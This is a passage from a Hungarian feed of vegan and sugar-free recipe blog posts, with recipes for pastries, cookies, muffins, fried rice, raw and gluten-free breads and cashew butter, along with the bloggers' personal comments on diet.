egyszerű, könnyen vegánosítható, a tej helyett csak szójatejet kell bele tenni, és a vaj helyett olivaolajat önthetünk a tésztába. Én nem érzek nagy különbséget a két tészta között, kicsit talán nehezebbnek találom a tejeset. Ez utóbbi ritkán is készül nálam, de múltkor a szójától el kellett tekintenem a fogyasztók idegenkedése miatt. Értem, hogy miért, de nem értek vele egyet. Ha nem génmanipulált, akkor egészséges alternatívája lehet a húsnak. Magas fehérjetartalmú. A különböző ráaggatott problémák már csak azért sem állják meg a helyüket (pl. fitoösztrogéntartalom), mert ha igaz lenne, lassan kihalt volna a kelet, már pedig elég szaporának tűnnek. A hozzászokás pedig bizonyos ételféleségekhez nem hosszú évekig tart, hanem hetekig. Azután nem okoznak problémát. Csak próbáld ki azt az egyszerű dolgot, hogy csak fele annyit sózol, vagy édesítessz 2 hétig... És persze ahogy mindenre igaz, erre is, hogy nem mindegy, hogyan készítjük el. Lehet jól, és rosszul. A tofu, a szójaizolátum tartalmú ételek, mint a burizer, vagy a szójatej könnyen emészthetőket. A szójakocka az olyan, mint régen a margarin volt, inkább ne is... Mindegy is, magamban csak azt tettem fel, hogy az emberek, ha meg merik enni a húst, akkor a szóját miért nem?!  A fenti felsorolás ellenére elfogadom az ilyen döntéseket, hiszen magam meg a húsnemevéshez ragaszkodom, ki ehhez, ki ahhoz. Épp ezért nem tettem észrevétlenül sem került élelmiszert az ételbe, hiszen magam sem lennék boldog ha pl. valaki disznózsírt csempészne az ebédembe. Hozzávalók:  40 dkg teljes őrlésű tönkölyliszt 20 dkg fehér liszt 380 g szójatej 5-6 ek olivaolaj 3 ek gyümölcscukor 1 csipet vaníliapor 1 kk só 2 dkg élesztő cukormentes lekvár (szilva, vegyes, barack) Általában a kenyérsütő üstjében dagasztatom meg a tésztát, de kézzel is jól kidolgozható. Az a lényeg, hogy ruganyos tésztát kapjunk. Először a száraz hozzávalókat keverjük el, majd adjuk hozzá az olajat, az élesztőt és a tejet. Az élesztőt külön nem szoktam felfuttatni, feljön a tészta szépen így is. Alaposan dagasszuk meg a tésztát, míg "csöpög a plafon". :) Amikor készen van, ujjnyi vastagra nyújtjuk, 8 egyforma téglalap alakú darabra vágjuk, megtöltjük két kanál lekvárral. Két oldalról a tésztát egymásra hajtjuk, összenyomkodjuk a széleket, majd a végét is összenyomkodjuk, és maga alá hajtjuk. Zsírpapírral kibélelt tepsibe tesszük. Bő fél órát kelesztjük, és 40 percig közepes hőfokon sütjük. Rácson hagyjuk kihűlni.

Vegán mandulás földimogyorós keksz

2014. március 26. Zizi kalandjai 

Vegán mandulás földimogyorós keksz Na ez az a keksz, amit először odaégettem… mert elszoktam a sütéstől. Remélem sikerül visszarázódnom – ami a sütést illeti -, ráadásul el kell kezdenem Ádi első születésnapi tortájának a tesztelését. A napján egy palacsinta tortát fogok készíteni, aztán a partin, ami néhány nappal később lesz (családokkal, barátokkal együtt ünnepelve) sütni fogok tortát is. Szeretnék teljesen cukormenteset készíteni, ami csak banánnal lesz édesítve, de majd meglátom… lehet, hogy egy kis juharszirupot fog kapni a torta. Szóval az odaégetésnek köszönhetően második alkalommal kicsit változtattam a recepten, így más lett a tésztának az állaga és a kekszek formája is. Édesítésre az új kedvencemet, a kókuszvirág cukrot használtam. A tojást őrölt lenmaggal és vízzel helyettesítettem. Zablisztet és mandulalisztet adtam hozzá, de ezek változtathatók. Őrölt mandula helyett lehet használni őrölt törökmogyorót, a zab helyett pedig lehet tönkölylisztet használni vagy sima búzalisztet. A földimogyoró és mandula jól kiegészítik egymást, azonban a földimogyorónak dominánsabb az íze. Egy dolgot csinálnék legközelebb másképp… a megsült, kihűlt kekszeket, legalábbis a felüket olvasztott étcsokoládéba mártogatnám. Az étcsokis máz nagyon feldobná ezeket a kekszeket. Tízóraira, uzsonnára, nasinak kávé vagy tea mellé kiváló. Mérettől függően 12-16 darab lesz belőle. Vegán mandulás földimogyorós keksz Hozzávalók kb. 12 db-hoz: - 1/­­4 bögre földimogyoróvaj (házilag készített vagy boltban kapható) - 1/­­4 bögre kókuszzsír (szilárd állapotban) - 1/­­2 bögre kókuszvirág cukor - 1/­­4 bögre mandulatej (zab-, rizs-, szójatej is használható) - 1 és 1/­­4 bögre zabliszt - 1 bögre őrölt mandula - 1 evőkanál őrölt lenmag - 3 evőkanál víz - 1 teáskanál sütőpor - 1/­­2 teáskanál szódabikarbóna - 1/­­4 teáskanál Himalaya só + egy kevés a szóráshoz - 1 vaníliarúd kikapart magjai Egy kis tálkában keverjük össze a lenmagot a vízzel és hagyjuk állni 4-5 percig, amíg zselés állagú lesz. Melegítsük elő a sütőt 170C fokra. Egy tálban keverjük össze a földimogyoróvajat a kókuszzsírral és a cukorral. Adjuk hozzá a mandulatejet, majd a lenmagos keveréket és keverjük simára. Ekkor adjuk hozzá a sót, a vaníliát, a sütőport, a szódabikarbónát, majd a végén a zablisztet és a mandulalisztet. Keverjük simára (közepesen lágy tésztát kapunk). Fagyis- vagy evőkanállal adagoljunk gombócokat a sütőpapírra. Tetejüket szórjuk meg egy kevés sóval és süssük 15-20 percig, amíg aranybarnák lesznek.

Diós - banános hajdinamuffin

2014. március 13. Vegagyerek 

Diós - banános hajdinamuffin Nincs mit szépíteni, ez a süti 100% hajdinaliszttel (úgy lesz gluténmentes!) nem volt egy világszám (én sehogy sem tudom megszokni a hajdina jellegzetes mellék-/­­ utóízét:/­­) Miután azonban a megadott liszt menyiségét lecseréltem félig teljes kiőrlésű tönkölylisztre, mmmmm...:) Egy cukormentes, alig édes reggeli, vagy uzsonna-süti, ami viszont egy jó kis gabonakávés-szójatejes cappuccinoval üdítően hat!;) És gyorsan elkészül, akár vasárnap reggel is!:) Diós - banános hajdinamuffin  Elkészítési idő: kb. 25 perc Hozzávalók (9 db muffinhoz): 2 banán (kb. 200 g meghámozva), felaprítva 50 g dió, durvára vágva 200 g hajdinaliszt, de nálam ez volt fele teljes kiőrlésű tönkölyliszt! tengeri só 1 tk. őrölt fahéj 170 ml zabtej (ha tönkölyliszttel készíted, az több folyadékot vesz fel kicsivel!) 50 g (kókusz)olaj 55 g rizsszirup/­­ agave szirup 2 tk. foszfátmentes borkő sütőpor (pl. DM-ben is kapható!) Melegítsük elő a sütőt 180 fokra, légkeverésre. Egy nagy tálban keverjük össze a hozzávalókat, utoljára adjuk hozzá a banánt és a diót. Papírkapszlikkal kibélelt muffinformába kanalazzuk a tésztát, és a sütő középső sínjén kb. 15-17 percig sütjük. Fogpiszkálóval a közepébe szúrva ellenőrizzük, kisült-e. Fogyasztás előtt hagyjuk kicist kihűlni. Forrás: Attila Hildmann: Vegan for Youth

Vegán pirított rizs minden földi jóval + cukormentes hónap lezárása

2014. március 6. Zizi kalandjai 

Vegán pirított rizs minden földi jóval + cukormentes hónap lezárása A héten ez az étel volt a fénypont, vagyis az újdonságok közül a legfinomabb. I. főzött spenótos paradicsomos tésztát és az is a nap fénypontjának számított, csak az nem újdonság, mert ilyet sokszor ettünk és eszünk is. Nagyon szeretem az ázsiai konyhából a pirított rizst, de soha nem csináltam még. Pedig sokszor marad ki főtt rizs és ezt, mint maradékot hasznosíthatjuk sok zöldséggel feldobva és máris királyi a lakománk. Került a rizsbe sütőtökkrém és egy kis kurkuma, ami sárgára színezte, így úgy nézett ki, mintha tojásos lenne, pedig nem! A kurkumáról az utóbbi időben rengeteg jót olvastam, ezért igyekszem beépíteni a hétköznapjainkba. A friss változat úgy néz ki, mint a gyömbér, csak kicsit vékonyabb és ha meghámozzuk gyönyörű narancssárga színű a belseje. Itthon még soha nem láttam, lehet, hogy nem is kapható, de az őrölt formája szinte minden üzletben elérhető. Erős antioxidáns, emésztés-serkentő, vércukorszint-stabilizáló, gyulladáscsökkentő hatásokkal bír és az ízületeket érintő gyulladásos folyamatokra is hatékony. Két érdekesség a kurkumáról: 1) Fűszerként alkalmazva felszívódását a fekete bors elősegíti, de ha célunk az, hogy a vastagbélbe jusson, nem kell fekete borssal társítani. 2) Nem javasolt várandósság fennállta esetén, mivel fokozhatja a méh simaizomzatának összehúzódását. Azonban szülés után az ájurvéda a méhösszehúzódás elősegítésére ajánlja. A cukormentes kihívás negyedik hete viszonylag jól telt, de az utolsó négy-öt napban már vágtam a centit. Kívántam már a sajtot, a csokit és azt, hogy ha megkívánok egy sütit vagy éppen gofrit, akkor ne kelljen visszafognom magam. A tojásnak ugye engedtem, ezt ettem néhány alkalommal a négy hét alatt. Az utolsó napon este hat órakor befejeztük a kihívást, kész, vége, ennyi volt, tovább nem vártunk! Én megittam egy vegán forró csokit, I. pedig egy flat-white-ot és evett egy brownie-t. Minden nagyon édes volt, vagyis annak éreztük, szóval nekem a forró csoki nem is ízlett annyira, mint korábban. Egy ilyen hónap mindig jó tanulólecke. Az ízek rabjai vagyunk, ez tagadhatatlan. Kemény feladat ellenállni egy ételnek/­­italnak, ha valamit megvonunk magunktól. Azért vállon veregettük magunkat, hogy milyen ügyesek voltunk, hogy megint végigcsináltuk. Mi mindenképpen bedobunk a közös kasszába egy keveset és ha valaki úgy gondolja, hogy szintén megszegte a felállított szabályait, “bűnözött” és szeretne jótékonykodni, az jelezze nekem emailben és átküldöm a részleteket, hogy hogyan oldjuk meg a Food Not Bombs Budapest támogatását élelmiszerrel. Facebookon és Instagramon is elég sok kép összegyűlt, amelyeket megtaláltok a #februaricukormenteskihivas alatt. Köszönöm mindenkinek, aki időt nem kímélve folyamatosan küldte nekem a képeket emailben, meg eleve köszönöm mindenkinek, aki részt vett a kihívásban! Fantasztikusak vagytok! És akkor már csak egy dolog maradt hátra… JÖVŐRE VELETEK UGYANITT! Eszter – beszámolója Dublinból Vegán pirított rizs minden földi jóval (Recept néhány változtatással: Healthy Happy Life) Hozzávalók 2 főre: - 1 és 1/­­2 csésze főtt barnarizs - 1 fej vöröshagyma, felaprítva - 3 gerezd fokhagyma, felaprítva - 4 evőkanál sült sütőtökpüré (én Ádika adagjából vettem el 4 kanálnyit ) - 1 csomag (300 g) tofu, felesleges víz kipréselve belőle és 1*1 cm-es kockákra vágva - 1 kis csokor leveleskel, levelek eltávolítva a szárról és apró darabokra tépkedve (kelkáposzta is használható a leveleskel helyett) - 2 teáskanál kurkuma - 1/­­2 teáskanál cayenne bors - 2 teáskanál juharszirup - kevés citromlé - só, bors - kókuszzsír vagy olívaolaj Egy serpenyőben 2 evőkanál kókuszzsíron dinszteljük meg a vöröshagymát 2-3 perc alatt. Adjuk hozzá a főtt rizst, a sütőtökpürét, sót, borsot, fokhagymát, kurkumát, cayenne borsot. Jól keverjük össze és pirítsuk 4-5 percig, amíg az ízek összeérnek. Én kikanalaztam a rizst egy tálba és ugyanebben a serpenyőben folytattam tovább a főzést. Tegyünk a serpenyőbe 1 evőkanál kókuszzsírt, adjuk hozzá a tofut, sózzuk, borsozzuk, majd adjuk hozzá a juharszirupot és magas láng felett pirítsuk meg (közben forgassuk a kockákat, hogy minden oldalukon megpiruljanak). A tofut hozzáöntöttem a rizses keverékhez és a serpenyőt visszatettem a tűzhelyre. Tegyünk bele 1 evőkanál kókuszzsírt, majd dobjuk bele a leveleskelt és magas lángon pirítsuk meg, 2-3 perc után öntsünk hozzá 2 evőkanál vizet, hogy kicsit párolódjon. Sózzuk, borsozzuk és a végén locsoljuk meg egy kevés citromlével. Ezt is öntsük a rizses keverékhez és már tálalhatjuk is. ***** Manapság így zajlik a fotózás, ha Ádi is itthon van…

Aszalt barackos - diós, sokmagvas reggeli

2014. március 3. Vegagyerek 

Aszalt barackos - diós, sokmagvas reggeli Egy valóban 5 perces reggeli, amit akár több adagban előre is összekeverhetsz, és egy befőttes üvegben tárolva más napokon is felhasználhatsz! A receptben megadott mennyiség nem túl kicsi adag egy főre sem, ezért javaslom, először csak szemre annyi alapkeveréket tegyél a tányérodba, amennyit gondolsz, és a maradékot akár a munkahelyedre is elviheted egy kis befőttesüvegben. Pakolsz mellé egy kis 2 decis növényi tejet (lehet kapni több helyen), és amikor megéheztél csak ráöntöd, és már kész is a tízóraid!;) Az amaránt és a quinoa komplex szénhidrátot biztosít, nem beszélve az igen magas fehérjetartalmukról! Aszalt barackos - diós, sokmagvas reggeli Elkészítési idő: 5 perc Hozzávalók (2 főre): 30 g dió, durvára aprítva 8 db (bio, kénezetlen) aszalt sárgabarack, durvára aprítva 50 g puffasztott amaránt 40 g natúr kukoricapehely 40 g (bio, kénezetlen) mazsola 15 g puffasztott quinoa Keverjük össze az összes hozzávalót egy tálban, öntsünk rá bármilyen (cukormentes!) növényi tejet (pl. zabtej), és gazdagíthatjuk friss szezon gyümölccsel is tetszés szerint. Forrás: Attila Hildmann: Vegan for Youth

Nyers kenyér (gluténmentes, gabonamentes, élesztőmentes)

2014. február 23. VegaLife 

Nyers kenyér (gluténmentes, gabonamentes, élesztőmentes) Múlt hétfőn az általam tartott főzőkörön a kenyérkészítés volt a téma. Gluténmentes kenyér készítését már megosztottam itt a blogon, sőt az élesztőmentes pászka különböző receptjeivel is találkozhattak sokkal korábban rendszeres olvasóim. Még egy kihívás várt rám - elgondolásom szerint - ez pedig a nyers kenyér. Vagyis azokra is gondoltam, akik rövid vagy hosszútávon nyers táplálkozást folytatnak. Mivel van az ismerőseim között nyers-táplálkozást folytató, így ezért is fontosnak tartottam, hogy a nyers kenyér készítését is elsajátítsam. Arról nem beszélve, hogy alig várom azt az időszakot, amikor végre egész nap csak friss gyümölcsön, zöldségen élhetek, mert terem a kertekben és a földeken mindenféle finomság és nem főként  import élelmiszert kell piacon vásárolni. Milyen jó lesz akkor IS elkészíteni ezt a kenyeret! Szóval ennek a kedves - magam által felállított - kihívásnak tettem eleget, amikor a következő nyers kenyeret elkészítettem. A recept: Hozzávalók: - 1 nagyobb alma - 10 dkg dió - 30 dkg őrölt lenmag - 10 dkg őrölt szezámmag - 1 teáskanál só - Víz - Aszalógép   Elkészítés: A magvakat először is megőröljük. Az almát lereszeljük, összekeverjük az őrölt magvakkal, sóval és annyi vízzel, amennyit az egész felvesz úgy, hogy formázható ,,gombócot kapjunk. Valamilyen formába tesszük (pl. őzgerinc) úgy, hogy a formát felvegye. (Nekem van egy speciális szív-alakú kenyérformám, ezt használtam) Érdemes a formát papírral vagy frissen-tartó fóliával kibélelni, így könnyebben ki tudjuk szedni. Szikkadni hagyjuk egy rövid ideig, majd felszeleteljük és aszalógépben (vagy villany sütőben ,,melegen tartó programon) 2 órát aszaljuk a ,,kenyérszeleteket. Minél inkább szárazra aszaljuk, annál tovább eláll. Az általam elkészített, felszeletelt nyers kenyeret 7 napig fogyasztottuk. Amikor az aszalással kész voltam, nem zártam el dobozba, még "szellőztettem" legalább fél napot.  UI: Természetesen, ha valami különleges formájú kenyérszeleteket szeretnénk, akkor a tésztát kinyújthatjuk ujjnyi vastagságúra és formákkal kiszaggathatjuk, ezt követően pedig megaszaljuk.  

Kókuszos csoki (egészséges, nyers, cukormentes)

2014. február 14. Fitt Nők 

Kókuszos csoki (egészséges, nyers, cukormentes)A Facebookon láttam valahol egy hasonló finom csokit, ezt hoztam össze saját ízlés szerint egy plusz kakaóvajjal, hogy “törjön”. Nagyon finom lett. Többféle variációban készíthető: pl. aszalt gyümölcsdarabokkal kiegészítve, mogyorósan, kókuszreszelék nélkül, plusz csokimázazva a tetején, chilivel, puffasztott rizzsel… stb. A hozzávalók mennyisége ízlés szerint. A lényeg, hogy egy sűrű massza legyen, amit majd elterítünk sütőpapíron. Hozzávalók: mandulatejből megmaradt mandulaliszt, kókuszreszelék (kevés), kókuszzsír, kakaóvaj, cukrozatlan kakaópor, méz A mandulalisztet összekeverjük a kakaóporral (a száraz hozzávalókat), majd belecsurgatjuk a mézet, beleadagoljuk a kókuszzsírt és a megolvasztott kakaóvajat. Egy sütőpapírral kibélelt formába tesszük, vagy sütőpapírral fedett tányérra, ha nem sok a mennyiség, ellapítjuk laposra, és ezt az egészet dermedésig betesszük a fagyasztóba. Ez csupán néhány perc. Dermedés után szeletelhető és azonnal fogyasztható. Hasonló íze van, mint ennek a kókuszgolyónak, csak egy kicsit csokisabb: kókuszgolyó.

Céklás csokoládé torta rózsaszín habos krémmel

2014. január 31. Zizi kalandjai 

Céklás csokoládé torta rózsaszín habos krémmel Ígértem még édes receptek, hát íme az egyik. Egy gyönyörű rózsaszín habos csokitorta… mondjuk Valentin napra! A torta vegán, a krém viszont lakto vegetáriánus, mert mascarponeból készült. Ha valaki tud jó vegán sajtkrémről (az ne habozzon nekem elárulni, hogy hol veszi!), akkor simán helyettesítheti a mascarponet vele. A tésztájába és a krémbe is került cékla, de, aki idegenkedik a cékla földes ízétől, az ne tegye, mert  nem érződik. Sütöttem már egy hasonlót és már akkor kiderült számomra, hogy a céklától puha, omlós, “szaftos” marad a tésztája, tehát nem morzsálódik és imádom az ilyen sütiket. A krém enyhén van édesítve, a cékla pedig gyönyörű rózsaszínné varázsolja. A recept innen van, jó néhány módosítással, főleg, ami a cukor mennyiséget illeti. Szóval, aki nem tart velem a cukormentes februári kihívásban, az feltétlen süsse meg ezt a tortát és amíg eszi, gondoljon ránk! A recept pedig kivételesen nem itt olvasható, hanem a Kifőztük magazin februári számában!

Kesudiókrém 'eská':)

2014. január 24. Vegagyerek 

Kesudiókrém 'eská':) Erre a projektre nagyon sokáig készültem lélekben...:) Sok-sok bejegyzést elolvastam a neten, ahol sok-sok leégett aprító és mixergépről számoltak be, akik otthon nekiálltak.:/­­ Meg sok-sok türelmet és időt írtak, mint legfőbb hozzávalók...:) Ezen tényezők miatt (is) tartott kb. egy évig, mire végre rászántam magam!:))) Először a natúr mandulakrémet akartam kipróbálni, de miután legalább 5-6 alkalommal megvettem a hozzávaló mandulát, amit aztán a Férjem minden egyes alkalommal felevett, gondoltam próbát teszek a kesudióval...:DDD A natúr magkrémek, mint pl. a fehér mandulakrém és a kesudiókrém (ez a kettő a kedvencem), a tavalyi Vegán Kihívásos ételek során kúszott be az életembe. Attila Hildmann, a német Vegán Kihívás szerzője, gyakorlatilag szinte minden receptben használja. Viszont mindkettő egy vagyonba kerül...:/­­ A mandulakrémből létezik kétféle, a hántolt fehér mandulából készülő fehér/­­ vagy világos (ez a tuti finom, isteni!), és a hántolatlan mandulából készülő sötét mandulakrém. Ez utóbbi lényegesen olcsóbb, mint a fehér, viszont a beledarált külső réteg miatt határozottan kesernyés ízű. 250 g mennyiségnyi krém most (2014. január) a sötétből kb. 2.000 - 2.500 Ft, a világos, vagy fehér pedig 3.500 - 4.100 Ft. A kesudiókrém is nagyon finom, édeskés ízű, ebből 250 g/­­ kb. 2.500 Ft. Ezek a mennyiségek (egy kb. 2,5 dl-es üvegben) sokáig kitarthatnak, de ha sokszor használjuk, vagy esszük, akkor nagyon gyorsan el tud fogyni!:) A kesudiókrém egy háziasabb verzióját, ugyanekkora mennyiségre kihozhatjuk kb. 900-1.000 Ft-ból. Jó, nem lesz olyan krémes, mint a bolti, de sokmindenhez ugyanúgy használhatjuk! Lehet kenyérre kenni (olyan nutella-szerűen akár, itt a blogon találsz is hozzá ilyen receptet ITT), rá egy kis cukormentes szilvalekvár és hamm!:) Lehet desszertekhez, vagy szószokhoz is felhasználni, vagy a reggeli gabonakásába egy evőkanállal a darált olajos mag helyett! Vagy amikor éppen nagyon éhes valaki, uzsonnára egy-két teáskanállal magában!;) Lent a receptben megosztom a készítéssel kapcsolatos tapasztalataimat. Már ezekben próbáltam: Csicserikrémes padlizsán - lasagne Almás - fahéjas köleskása Céklatorony avokádós kesukrémmel és karamellizált tofuval Natúr kesudiókrém (egy kb. 250 ml-es üveg feltöltéséhez) Hozzávalók: 400 g kesudió Elkészítés: A natúr kesudiót beletesszük egy aprítógépbe, és elkezdjük felaprítani. Ahhoz, hogy ne égjen le a gépünk, érdemes max. 2-3 percenként (vagy amikor érzed, hogy nagyon melegszik a gép oldala), 1-2 percre megállítani pihenni a gépet. Na ezért tart olyan irgalmatlan sok időbe a teljes folyamat, nálam kb. 1 óra volt...:/­­ Először ilyen morzsás állagú lesz: Utána szorgalmasan tovább aprítunk, és közben pihentetünk, majd ahogy elkezd a melegedés hatására kiválni a magokból az olajtartalom, a morzsa elkezd összeállni: És még mindig ne adjuk fel, mert egyszer csak a türelem meghozza a gyümölcsét, és krémesedni kezd a massza.:) Az utolsó szakasz nehézségét nekem még az adta, hogy a krém egy idő után besűrűsödött a penge alá, és oda beragadt. Elég sokszor kellett fakanállal megkevergetnem. Végső konklúzió: nem lett olyan krémes, selymes, mint a bolti, nekem az én gépemmel (Moulinex) maradt kicsi morzsás rész  a krémben. Viszont, 2.500 Ft helyett, kb. 1.000 Ft-ból kijött egy kis üveg, amit ugyanúgy fel tudtam használni! És egy hét alatt el is fogyott...:p

Gluténmentes kalózkenyér (tej-, tojás-, kukorica-, cukormentes)

2014. január 16. VegaLife 

Gluténmentes kalózkenyér (tej-, tojás-, kukorica-, cukormentes)Régóta itt motoszkált bennem, hogy ki kellene próbálni valami gluténmentes kenyér-féleséget. Leginkább az tartott vissza, hogy mindig kukoricaliszttel készítik (többek közt), amit én nem preferálok. A másik gondolatom az volt, hogy de jó lenne úgy elkészíteni, hogy nem használok "boltokban kapható" lisztkeveréket. Szerettem volna, ahogy a teljes kiőrlésű liszttel készült kenyereknél, úgy ennél sem kell cukrot (vagy édes társait) hozzáadnom az élesztőhöz, de mégis "magas" kenyér legyen. Judit barátnőm gluténmentes étkezést folytat, és vendégségbe hívott magukhoz. Úgy emlékeztem, nem szokott gluténmentes kenyeret készíteni. Gondoltam, megpróbálok hát valami egyedit készíteni neki ajándékba. Így történt, hogy magaménak tudhatom a gluténmentes kenyér receptjét. Sikerült elsőre! Finom is lett, és sokkal kevesebb szelet elég belőle, mint a hagyományos teljes kiőrlésű liszttel készült kenyérből (pedig arra is igaz ez a mondás, szemben a fehér kenyerekkel).  A recept: Hozzávalók: - 1 csomag élesztő - 5,8 dl víz - 18 dkg köles megdarálva - 18 dkg hajdina megdarálva - 18 dkg barna rizs megdarálva - 5 evőkanál útifű maghéj (LÉT-ELEME!) - 5 evőkanál megdarált lenmag - 1 dkg só - 2-3 evőkanál olaj - sütőpapír vagy kókuszzsír - magok (opcionális)   Elkészítés: Az élesztőt a kenyérsütő üstjébe morzsoljuk. Felöntjük a kimért vízzel. Amíg feloldódik a vízben (nem fog a tetejére feljönni, csak feloldódik), addig megdaráljuk a gabonákat. Mindegyiket külön. A barna rizs fog legtovább tartani. Ha nincs más, kávédarálót is használhatunk. Nekem van egy 500 wattos aprító-daráló gépem, azzal dolgoztam, de korábban már próbálkoztam rizst kávédarálóval őrölni, és ha sokáig daráljuk, lisztes, porszerű lesz. Amikor megvan mindhárom lisztünk, a lenmagot is megdaráljuk (ha épp nincs otthon darálva). Az élesztős vizet egy kicsit megkeverjük, majd hozzáadunk elsőnek az 5 kanálnyit útifű-maghéjból. Ez az alap ahhoz, hogy jól sikerüljön a kenyér. Várunk kb. 1-2 percet, míg az útifű-maghéj magába szívja a folyadék egy részét. Ezt követően a darált lenmagból is mehet hozzá. Beleszórjuk a három fajta lisztet, a sót, 2-3 evőkanál olajat (olívaolajjal dolgoztam). A kenyérsütőben a dagasztás programot (dough) választottam. A kis gép 30 percig keverte lapátjával a tésztát. (Kevesebb is elég lett volna, de épp nem voltam a közelében, hogy leállítsam.) Ha kenyérsütő nélkül dolgozunk, akkor fakanállal kell jó alaposan átdolgozni a tésztát (ragacsos lesz). Ezután kivettem, a fűtőtestünk közelébe helyeztem letakarva és kb. 30-40 percig pihentettem, míg a tészta szépen megkelt. Mivel ajándékként készült, szerettem volna egyedi jelleget neki, így a korábbi ötletet követve kimosott, kókuszzsírral kikent, aprított magokkal meghintett konzervben sütöttem meg. A tésztát 1 nagy és 3 kicsi részre osztva, rögtön a formába tettem, anélkül, hogy újra átgyúrtam volna (elég ragacsos volt a tésztája). (A 3 kicsi forma helyett 2 is elég lett volna, magasabbra kel meg akkor ugyanis.) Érdekes volt nagyon a tészta tapintása. Eltért a korábban megszokott nyers kenyértésztától. Olyan volt, mintha tejszínhabhoz sok-sok lisztet kevertünk volna. Habos jellegű.  Amennyiben kenyérformában sütjük meg, a formába sütőpapírt is tehetünk, és egyszerűen csak beletesszük a megkelt kenyér tésztáját. Meleg helyen, a formát letakarva ismét kelesztjük kb. 40 percet. Előmelegített sütőben kb. 30-40 perc alatt (kinek milyen sütője van) közepes (nem a legnagyobb) lángon megsütjük. Mivel nem papírban sült, kellett egy kis "szikkadási" idő, míg ki lehetett szedni a formákból. Rácsra téve várjuk meg míg kihűl. A kenyerecskék este sültek és másnap én is ettem belőlük. Finom volt nagyon. Néhány napig eláll ez a gluténmentes kenyér. Figyeljünk arra, hogy száraz, légmentes helyen tároljuk, ha lassan fogyasztjuk el.  

Teljes kiőrlésű gyümölcskenyér, cukormentesen

2014. január 4. Vegagyerek 

Teljes kiőrlésű gyümölcskenyér, cukormentesen Ez a recept a Vegán Kihívás ételei között szerepelt, és már nagyon régóta el akartam készíteni. Az az egy dolog tartott vissza, hogy az alaprecept a tészta kelesztéséhez egy 'Backferment', azaz sütő ferment nevű hozzávalót írt, amit nem tudtam beszerezni. Nemrégiben viszont egy német fórumon olvastam, hogy egy lány egyszerűen sütőporral helyettesítette, így nekiugrottam én is.:) Egy igazi fehérjebomba született, amiből 1-2 szelet reggelire olyan tömény, hogy egy teljes délelőttre eltelít.:) Lehet kenni rá valamilyen magkrémet, pl. kesudió, vagy mandulakrémet, és/­­ vagy cukormentes pl. szilvalekvárt is. Ja, és először próbáltam ki a goji bogyót, ami magas C-vitamin tartalmával különösen előnyös télen! A gyömölcskenyér íze alig édes, az agave szirup és az aszalt gyümölcsök adják az édes ízt, ezért aki a natúr ízeket kedveli, annak nagyon fog ízleni! Egy cukormentes időszakba is jól beilleszthető! Egyetlen dolog, ami nem annyira jött be nekem benne, a puffasztott amaránt, aminek noha nagyon nagy a fehérjetartalma, viszont van az a kicsit "földes":DD jellegű utóíze, ami szerintem kiérződik belőle kicsit, és én kihagynám...:)) (bár Anyukám azt mondta, neki ez nem tűnt fel...) A töménysége miatt tényleg lassan fogyott, úgyhogy én három részre vágtam, és le is fagyasztottam belőle. Teljes kiőrlésű gyümölcskenyér, cukormentesen Hozzávalók (kb. 18 szelethez - egy 26 cm-es gyümölcskenyérformához): 550 g teljes kiőrlésű tönkölyliszt 1 cs. foszfátmentes borkő sütőpor (pl. DM-ből) kb. 400-450 ml víz 100 g aszalt vörösáfonya, nem cukrozott! (nálam mazsola) 100 g aszalt szilva 20 g goji bogyó, nem cukrozott! (vagy helyette más nem cukrozott aszalt gyümölcs) 100 g kesudió 50 g pirított mogyoró 30 g puffasztott amaránt 50 g lenmag 100 g agave szirup 1/­­2 tk. só Melegítsük elő a sütőt 180 fokra. Öntsünk egy tálba a lisztet és a sütőport, majd annyi vizet, hogy rugalmas, ne kemény tésztát kapjunk! Jól gyúrjuk össze! Az aszalt gyümölcsöket és a dióféléket aprítsuk fel, és az amaránttal, lenmaggal, agave sziruppal és sóval együtt keverjük bele a tésztába. Olajozzunk/­­ kókuszzsírral kenjünk ki vékonyan egy 26 cm-es gyümölcskenyér-formát, öntsük bele a tésztát, és kb. 60 percig süssük. Csak kihűlés után szeleteljük! Fogyasztásnál megkenhetjük natúr mogyoró-krémmel! Alapötlet: Attila Hildmann: Vegan for Fit

Mandarinos holdacskák

2013. december 31. VegaLife 

Mandarinos holdacskák Hogyan kerül ebbe a mandarinos- csokis-kekszes süteménybe avokádó? Az emberek nagy része ezt nehezen tudja elképzelni, vagy egyáltalán társítani. A következőkben elárulom ennek titkát. Csak óvatosan, mert függővé válhatsz! :) A  tészta receptje: Hozzávalók: 1/­­2 kg darált keksz 10 dkg kókuszreszelék növényi tejpor víz mandarin   Elkészítés: A tejporból és vízből kb. 3-4 dl növényi tejet készítünk. (Persze, ha nem sietős, nem tejporos növényi tejet is készíthetünk, "igazi" hozzávalókból - pl. kókusztejet , diótejet ) A megdarált kekszet felöntjük a tejjel, majd az egészből egy nagy gömböcöt, egy golyót gyúrunk. Mivel a keksz édes, a tejpor szintén édes, így nem gondolom, hogy szükséges tovább édesíteni. Kókusszal megszórt deszkán kinyújtjuk, elkenjük rajta a krémet (recept lásd lentebb) és kis pogácsaszaggatóval félholdakat szaggatunk a tésztából. A félholdacskák tetejére pedig mandaringerezdeket teszünk. Következzen az avokádó-titok: A  csokikrém receptje: Hozzávalók: - 1,5-2 db érett nagy avokádó (én másfél darabbal dolgoztam) - 5 dkg kakaópor (kevesebb karobbal is készíthető!) - 5 dkg kókuszolaj - 10 dkg édesítőszer, pl: nádcukor, nyírfacukor, méz, stb, ki mit használ - 1 csipet tengeri só - 1/­­2 vanília kikapart belseje vagy 1 teáskanál vanília esszencia Elkészítés: Vegyük elő a turmixgépet és a fentieket mindet, ebben a sorrendben tegyük bele. Indítsuk el, és hamarosan látni fogjuk hogy milyen fantasztikus krémet kapunk végeredményne k. Olyan krémet, mint a csokitorták csokikrémje. Ha lágyabb krémet szeretnénk, pár csepp vízzel vagy növényi tejjel krémesebb lesz. A kész krémet kb. 1/­­2 órára érdemes hűtőbe tenni, megdermedés után jobban használható. Amíg dermed a krém, van időnk elkészíteni a kekszből a tésztát a fentiek alapján, és/­­vagy mandarinokat pucolni, gerezdekre szedni. Férjem ezt a süteményt vitte munkahelyére a közös karácsonyozásra. Nagy sikere volt, gyorsan el is fogyott. Nem csak karácsonyra, hanem pl. szilveszterre is kitűnő, dekoratív és finom falatok. Persze a recept átalakítható egészségesebb formára, ha keksz helyett zabpelyhet darálunk (ekkor édesíteni kell), a csokikrémet pedig karobbal készítjük. Ehhez hasonlóan jártam el ennél a receptemnél.

Vegán csokoládés napraforgómagos rozs palacsinta

2013. december 12. Zizi kalandjai 

